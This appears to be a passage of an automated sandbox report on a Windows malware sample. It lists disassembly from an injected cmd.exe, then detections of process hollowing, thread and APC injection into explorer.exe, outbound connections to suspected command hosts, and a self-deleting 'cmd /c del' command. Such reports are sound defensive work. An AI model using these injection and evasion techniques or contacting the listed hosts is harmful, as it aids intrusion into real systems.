          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E33D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_0119439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_011943CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0119439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_011943CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 170.75.150.177 80
          Source: C:\Windows\explorer.exeDomain query: www.lume24.com
          Source: C:\Windows\explorer.exeDomain query: www.cryptocurrenciesmarketcaps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeDomain query: www.qzbozhijy.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1100000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeThread register set: target process: 684
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 684
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
          Source: explorer.exe, 00000005.00000000.489396240.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.476859972.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.454406886.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.531751140.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.485252952.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.469233599.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.485252952.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.469433162.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.445292066.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
          Source: explorer.exe, 00000005.00000000.485252952.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.469433162.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.445292066.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01193283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01193EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
